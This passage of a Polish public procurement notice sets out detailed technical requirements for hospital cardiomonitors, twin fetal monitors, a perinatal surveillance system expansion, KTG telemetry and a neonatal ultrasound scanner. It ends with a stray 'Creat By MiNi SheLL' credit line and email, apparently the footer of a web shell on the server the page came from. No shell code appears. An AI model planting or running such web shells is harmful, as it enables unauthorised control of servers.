11	Możliwość zawieszenia alarmów<br>
12	Wykrywanie impulsów stymulatora serca<br>
13	Możliwość wyboru kanału do detekcji stymulatora<br>
14	Możliwość podglądu w dowolnej chwili min. 10 min wstecz, zapisu EKG / full disclosure/. Możliwość zapisywania w pamięci kardiomonitora min. 10 odcinków EKG po min. 10 minut do późniejszego przeglądania.<br>
15	Analiza odcinka ST w zakresie +/- 0,8 mV z prezentacją co najmniej 4 odprowadzeń jednocześnie<br>
16	Możliwość ustawienia położenia punktu J<br>
17	Możliwość  własnego ustawienia pozycji pomiaru
Odcinka P-R<br>
18	Analiza arytmii co najmniej 10 rodzajów<br>
19	Możliwość powiększania dowolnego wybranego zespołu QRS i manualnego dokonywania pomiarów (amplituda i długości odcinków)<br>
20	Analiza zmian HR z dowolnie wybranego przedziału czasowego<br>
21	Statystyka zmian HR z prezentacją w postaci trendów graficznych<br>
	 NIBP<br>
22	Oscylometryczna metoda pomiaru<br>
23	Zakres ciśnienia skurczowego: min. 40-250 mmHg<br>
24	Zakres ciśnienia rozkurczowego: min. 10-180 mmHg<br>
25	Wyświetlanie wartości cyfrowych skurczowe/ rozkurczowe/średnie<br>
26	Czas pomiaru maks. 40 sekund<br>
27	Możliwość pomiaru u różnych grup wiekowych - od noworodka do dorosłego<br>
28	Możliwość automatycznego cyklu pomiarowego z regulowanym interwałem czasowym od 1-480 min<br>
	SpO2<br>
29	Pomiar metodą absorpcji światła<br>
30	Zakres pomiaru: 0-100%<br>
31	Dokładność pomiaru +/- 2%<br>
32	Sposób wyświetlania w postaci krzywej dynamicznej oraz cyfrowej<br>
33	Alarmy<br>
34	Czujnik palcowy<br>
	TEMPERATURA<br>
35	Zakres pomiaru: 0- 50 stopni C<br>
36	Dokładność pomiaru +/- 0,1 stopni C<br>
37	Rozdzielczość pomiaru +/- 0,1 stopni C<br>
38	Sposób wyświetlania- wartości cyfrowe<br>
39	Wyświetlanie różnicy temperatur<br>
	RESPIRACJA<br>
40	Metoda pomiaru impedancyjna<br>
41	Zakres pomiaru: 0-120 odd./min.<br>
42	Dokładność pomiaru +/- 2 bpm<br>
43	Sposób wyświetlania- w postaci krzywej dynamicznej oraz wartości cyfrowej<br>
44	Alarmy<br>
45	Sygnalizacja i możliwość wyboru z pozycji kardiomonitora odprowadzenia użytego do pomiaru oddechu w celu dopasowania do różnych sposobów oddychania (szczytami płuc, przeponą)<br>
	EKRAN<br>
46	Typ: TFT min. 12 cali<br>
47	Wysoka rozdzielczość monitora min. 800 x 600 dpi<br>
48	Możliwość wyświetlania jednocześnie min. 8 krzywych
Możliwość zmiany kolorów krzywych.<br> 
49	Wyświetlenie krzywe- podać<br>
50	Dane wyświetlane cyfrowo:<br>
- częstość akcji serca<br>
- średnie ciśnienie tętnicze<br>
- ciśnienie skurczowe<br>
- ciśnienie rozkurczowe<br>
- wartość saturacji<br>
- wartość respiracji<br>
- temperatura - 2 kanały<br>
wartość różnicowa temperatury  deltaT<br>
	TRENDY<br>
51	Pamięć trendu min 120 godz.
Możliwość zapisywania w pamięci kardiomonitora min. 10 odcinków trendów po min. 120 godzin do późniejszego  przeglądania<br>    
52	Pamięć dla wszystkich mierzonych parametrów<br>
	TYP URZĄDZENIA<br>
53	I klasa, BF i CF<br>
	INNE PARAMETRY<br>
54	Waga: max 7 kg<br>
55	Klawiatura alfanumeryczna do wprowadzania danych pacjenta: nazwisko, płeć, nr identyfikacyjny<br>
56	Oprogramowanie do obliczania leków<br>
57	Menu w języku polskim<br>
58	Łatwa obsługa<br> 
59	Monitor przystosowany do pracy w standardowej sieci Ethernet (złącze RJ-45) oraz do pracy w sieci poprzez łącze RS 422, w zależności od rodzaju okablowania dostępnego w danym pomieszczeniu.<br>
60	Proste uaktualnienie oprogramowania kardiomonitora poprzez złącze USB<br>
	WYPOSAŻENIE<br> 
61	Elementy wchodzące w skład wyposażenia: przewód pacjenta EKG do min. 3 elektrod, czujnik saturacji min. 2 szt., mankiet NIBP o standardowym rozmiarze, powierzchniowy czujnik temperatury, kabel zasilający.<br>
	INNE<br>
62	Gwarancja min 24 miesiące<br> 
63	Czas reakcji serwisu - w ciągu 24 godzin licząc od 
momentu  zgłoszenia awarii przez użytkownika.<br>
64	Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji.<br>
65	Bezpłatna instalacja urządzenia u Zamawiającego<br> 
66	Bezpłatne szkolenie pracowników Zamawiającego obsługujących urządzenie.<br>
67	Instrukcja użytkowania i karta gwarancyjna w języku polskim<br>
68	Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat.<br>
69	Aparat zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni ( w okresie gwarancji)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.51.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie Nr 5 - dostawa 2 szt. monitorów płodu do ciąży bliźniaczej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 5 - dostawa 2 szt. monitorów płodu do ciąży bliźniaczej, tj.:<br>
1.	Praca samodzielna lub w systemie nadzoru położniczego<br> 
2.	Ekran dotykowy o przekątnej min. 12 cm<br> 
3.	Alarm końca papieru<br> 
4.	Wskaźnik jakości sygnału<br>  
5.	Ręczny znacznik ruchów płodu dla matki<br> 
6.	Metoda pomiarowa Cardio - ultradźwiękowy Doppler pulsacyjny<br> 
7.	Standardowe prędkości przesuwania papieru 1,2 i 3 (cm/min)<br> 
8.	Automatyczne monitorowanie ruchów płodu<br> 
9.	Monitorowanie ciąży bliźniaczej<br> 
10.	Zakres pomiarowy 0-120 jednostek  (TOCO)<br>
11.	Zakres pomiarowy 50?240 bpm  (US)<br>
12.	Częstotliwość pracy mniejsza lub równa 1,7 MHz<br>
13.	Wartość natężenia emitowanej fali US mniejsza lub równa 3,0 mW/cm2<br> 
14.	Wózek pod KTG i telemetrię<br>
	Telemetria<br> 
1.	Odbiornik telemetrii- stacja bazowa, zasięg odbioru w linii prostej minimum 70 m.<br>
2.	Przetworniki Cardio i Toco w postaci nadajników bez przewodów<br> 
3.	Przetworniki Cardio i Toco wodoszczelne<br>
4.	Czas pracy przetworników Toco i Cardio przy w pełni naładowanych  akumulatorach min. 10 godz.<br>
5.	Masa przetworników:<br> 
- Cardio < 300 g<br> 
- Toco < 300g<br>
    	Wyposażenie dodatkowe<br>
1.	Interfejs J 70 do podłączenia systemu - 1 szt.<br>
2.	Znacznik ruchów płodu K 04 dla pacjentki - 1 szt.<br>
3.	Głowica Cardio - 2 szt.<br>
4.	Głowica Toco - 1 szt.<br>
5.	Pas mocujący głowice - 3 szt.<br>
6.	Kabel sieciowy - 1 szt.<br>
7.	Składanka papieru termicznego- 1 szt.<br>
8.	Żel - 1szt.<br>
	Inne wymagania<br> 
1.	Gwarancja min. 24 miesiące<br>
2.	Czas reakcji serwisu - w ciągu 24 godzin od momentu zgłoszenia awarii przez użytkownika<br>
3.	Instrukcja obsługi i karta gwarancyjna w języku polskim<br>
4.	Bezpłatny przegląd techniczny  min. 1 raz w roku w okresie trwania gwarancji<br>
5.	Bezpłatne szkolenie pracowników Zamawiającego obsługujących urządzenie<br>
6.	Bezpłatna instalacja urządzenia 
7.	Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat
8.	Aparat zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.51.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie Nr 6 - rozbudowa systemu monitorowania i nadzoru okołoporodowego Monako o dodatkowe 7 stanowisk oraz o interfejs..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 6 - rozbudowa systemu monitorowania i nadzoru okołoporodowego Monako o dodatkowe 7 stanowisk oraz o interfejs, tj.:<br>
1.	Rozbudowa i adaptacja posiadanego systemu nadzoru okołoporodowego Monako o kolejne 7 stanowisk nadzoru<br>
2.	Oprogramowanie systemu<br>
3.	Stanowisko monitorujące 2 szt.: komputer, monitor  LCD 22 cale , drukarka laserowa, moduł separacyjny<br>
4.	Moduł transmisji danych z barierą galwaniczną - 7 szt.<br>
5.	Materiały instalacyjne (gniazda systemowe, kable, przewody, osłony) - komplet<br>
6.	Interfejs J70 - 7 szt.  do monitorów płodu - podłączenie systemu nadzoru okołoporodowego<br>
7.	Współpraca z większością znanych na polskim rynku kardiotokografów<br> 
8.	Automatyczna analiza wszystkich rejestrowanych zapisów<br>
9.	Monitorowanie ciąży bliźniaczej<br>
10.	Możliwość przyłączenia do systemu pulsoksymetru płodowego<br>
11.	Możliwość rozbudowy o dodatkowe stanowiska nadzoru okołoporodowego<br>
12.	Oprogramowanie - komunikacja z użytkownikiem w języku polskim<br>
13.	Możliwość współpracy z nieinwazyjnym elektrokardiografem płodowym<br>
14.	Automatyczna analiza zapisu, z możliwością dopasowania kryteriów oceny i progów alarmowych przez użytkownika<br>
15.	Alarmowanie o wykrytych nieprawidłowościach  z podaniem jego uzasadnienia<br>
16.	Wyniki analizy wyświetlane na żywo, graficznie na krzywych KTG (akceleracje, deceleracje oraz skurcze)<br>
17.	Ocena zmienności FHR w ujęciu długo i krótkoterminowym oraz identyfikacja skurczów macicy<br>
18.	Zapamiętywanie zapisów i wyników analizy w pamięci min. 25 lat<br>
19.	Równoczesne monitorowanie pacjentek na poszczególnych stanowiskach monitorujących<br>
20.	Formularze z wynikami analizy w języku polskim<br>
	Inne wymagania<br> 
1.	Gwarancja min. 24 miesiące<br>
2.	Czas reakcji serwisu - w ciągu 24 godzin licząc od momentu zgłoszenia awarii przez użytkownika<br>
3.	Bezpłatny przegląd techniczny  min. 1 raz w roku w okresie trwania gwarancji<br>
4.	Bezpłatne szkolenie pracowników Zamawiającego obsługujących urządzenie<br> 
5.	Bezpłatna instalacja urządzenia<br> 
6.	Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat<br>
7.	Instrukcja obsługi i karta gwarancyjna w języku polskim..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie Nr 7 - doposażenie aparatu KTG o telemetrię..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 7 - doposażenie aparatu KTG o telemetrię, tj.:<br>
1	Odbiornik telemetrii zainstalowany przy jednym z monitorów płodu<br>
2	Odbiornik telemetrii - stacja bazowa, zasięg odbioru w linii prostej minimum 80 m<br>
3	Przetworniki Cardio i Toco w postaci wodoszczelnych nadajników bez przewodów<br> 
4	Czas pracy przetworników Toco i Cardio przy w pełni naładowanych akumulatorach min. 12 godz.<br>
5	Masa przetworników:<br> 
Cardio < 150 g i Toco < 150 g<br>
6	Gwarancja, min. 24 miesiące<br>                                                
7	Czas reakcji serwisu - w ciągu 24 godzin licząc od momentu zgłoszenia awarii przez użytkownika<br>  
8	Instrukcja użytkowania i karta gwarancyjna w języku polskim<br>
9	Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji<br>
10	Bezpłatne szkolenie pracowników Zamawiającego obsługujących urządzenie<br>
11	Aparat zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji)<br>
12	Bezpłatna instalacja urządzenia u Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie Nr 8 - dostawa 1 szt. ultrasonografu do badań noworodków..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie Nr 8 - dostawa 1 szt. ultrasonografu do badań noworodków, tj.:<br>
I	Informacje ogólne<br>
1	Zasilanie sieciowe 230V/50Hz<br>
2	Technologia cyfrowa<br>
3	Górna częstotliwość pracy ultrasonografu (rozumiana jako maksymalna częstotliwość głowic aktualnie dostępnych) - min. 15 MHz<br>
4	Dynamika aparatu - min. 230 dB<br>
5	Ilość gniazd do przyłączania aktywnych głowic obrazowych przełączanych elektronicznie min. 3<br>
6	Liczba kanałów odbiorczych min. 9000<br>
7	Monitor LCD min. 17 cali o rozdzielczości pracy min. 1200x1000 pikseli<br>
8	Możliwość zmiany położenia monitora w trzech płaszczyznach względem konsoli<br>
9	Możliwość zmiany wysokości - min. 10 cm<br>
10	Możliwość obrotu konsoli min +/- 120 st<br>
11	Liczba obrazów pomięci dynamicznej (cineloop) dla obrazu 2D i color Doppler - min. 1000<br>
12	Czas startu aparatu do momentu wyświetlenia obrazu USG - maks. 90 s<br>
13	Wyposażony w 4 skrętne kółka<br>
II	Tryby obrazowania<br>
1	2D (B-mode), M-mode, Anatomiczny M-mode<br>
2	Płynna zmiana szerokości pola widzenia dla obrazu B-mode dla wszystkich oferowanych głowic<br>
3	Zakres głębokości obrazowania aparatu min. 30 cm<br>
4	Obrazowanie rombowe na głowicach liniowych.<br>
5	Obrazowanie trapezoidalne na głowicach liniowych.<br>
6	Doppler pulsacyjny (PWD), Color Doppler (CD), Power Doppler (PD), M-mode na wszystkich oferowanych głowicach<br>
7	Regulacja wielkości bramki Dopplerowskiej w granicach min. 1-20 mm<br>
8	Kierunkowy Power Doppler<br>
9	Obrazowanie harmoniczne<br>
10	Tryb Duplex (Jednoczesne wyświetlanie na ekranie dwóch ruchomych obrazów w czasie rzeczywistym typu B i B/Cd)<br>
11	Tryb Triplex (B+PWD+CD/PD)<br>
12	Maksymalna szybkość odświeżania dla obrazu 2D min 750 Hz<br>
13	Maksymalna szybkość odświeżania dla obrazu CD min 300 Hz<br>
III	Oprogramowanie oraz funkcje pomiarowe i użytkowe<br>
1	Badania przezciemieniowe u noworodków<br>
Badania jamy brzusznej u noworodków<br>
Badania naczyniowe<br>
Badania kardiologiczne u noworodków<br>
2	Możliwość podziału ekranu 2D/PW w pionie i poziomie<br>
3	Oprogramowanie do pomiarów i obliczeń dla badań dopplerowskich z możliwością tworzenia własnych formuł obliczeniowych<br>
4	Pomiar odległości min. 7 pomiarów<br>
5	Pomiar obwodu, pola powierzchni, objętości przepływu<br>
6	Powiększenie obrazu w czasie rzeczywistym min. x 8<br>
7	Powiększenie obrazu zamrożonego min. x 8<br>
8	Funkcja automatycznej optymalizacji obrazu 2D przy pomocy jednego klawisza<br>
9	Funkcja automatycznej optymalizacji widma dopplerowskiego przy pomocy jednego klawisza (min. Automatyczny przesuw linii bazowej i dopasowanie skali)<br>
10	Automatyczny obrys spektrum i jednoczesne wyznaczanie parametrów przepływu min. 6 w czasie rzeczywistym na ruchomym spektrum<br>
11	Automatyczna optymalizacja częstotliwości Color Dopplera w zależności od głębokiego obrazowania z wyświetlaniem aktualnej częstotliwości<br>
12	Automatyczny obrys spektrum i jednoczesne wyznaczanie parametrów przepływu na zatrzymanym spektrum<br>
13	Funkcja zdefiniowania nowych pomiarów i równań dla oferowanych aplikacji<br>
IV	Głowice ultradźwiękowe<br>
1.	Liniowa<br>
1.1	Szerokopasmowa o zakresie częstotliwości nie węższym niż 4-12 MHz<br>
1.2	Pole widzenia min. 37 +/- 3 mm<br>
2.	Sektorowa kardiologiczna noworodkowa<br>
2.1	Szerokopasmowa o zakresie częstotliwości nie węższym niż 5-12 MHz<br>
2.2	Kąt widzenia min. 90°<br>
2.3	Szerokopasmowa o zakresie częstotliwości nie węższym niż 3-8 MHz<br>
2.4	Kąt widzenia min. 90°<br>
V	Mikrokonweks pediatryczny<br>
1	Szerokopasmowa o zakresie częstotliwości nie węższym niż 5-8 MHz<br>
2	Kąt widzenia min. 90°<br>
VI	System archiwizacji<br>
1	Videodrukarka czarno-biała<br>
2	Wewnętrzny twardy dysk o pojemności min. 120 GB<br>
3	Wbudowany w aparat układ cyfrowej archiwizacji na dyskach DVD CD-RW<br>
4	Archiwizacja nieruchomych obrazów na wewnętrznym dysku w standardach Windows, np. BMP, JPG, TIFF.<br>
5	Archiwizacja ruchomych obrazów na wewnętrznym dysku twardym w standardach Windows, np. AVI.<br>
6	Raporty do każdego rodzaju i trybu badania z możliwością dołączenia obrazów<br>
7	Interfejs sieciowy do transmisji obrazów i danych w sieci komputerowej wg standardu DICOM 3.0, min. DICOM print, store, worklist, raporty strukturalne<br>
8	Możliwość podpięcia dysku zewnętrznego przy pomocy magistrali USB w wersji minimum 2.0 w celu archiwizacji ruchomych obrazów<br>
VII	Możliwość rozbudowy systemu na dzień składania ofert<br>
1	Obrazowanie trójwymiarowe w czasie rzeczywistym z głowic wolumetrycznych z maks. prędkością min. 30 vps z możliwością dalszej obróbki bezpośrednio na aparacie<br>
2	Oprogramowanie do wyświetlania panoramicznego z możliwością wykonywania pomiarów<br>
VIII	Inne wymagania<br>
1	Gwarancja, min. 36 miesiące<br>                                                
2	Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat<br> 
3	Czas reakcji serwisu - w ciągu 24 godzin licząc od momentu zgłoszenia awarii przez użytkownika<br>  
4	Instrukcja użytkowania i karta gwarancyjna w języku polskim<br>
5	Bezpłatne szkolenie pracowników Zamawiającego obsługujących urządzenie<br>
6	Bezpłatna instalacja urządzenia<br> 
7	Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji.<br>
8	Aparat zastępczy jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.22.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com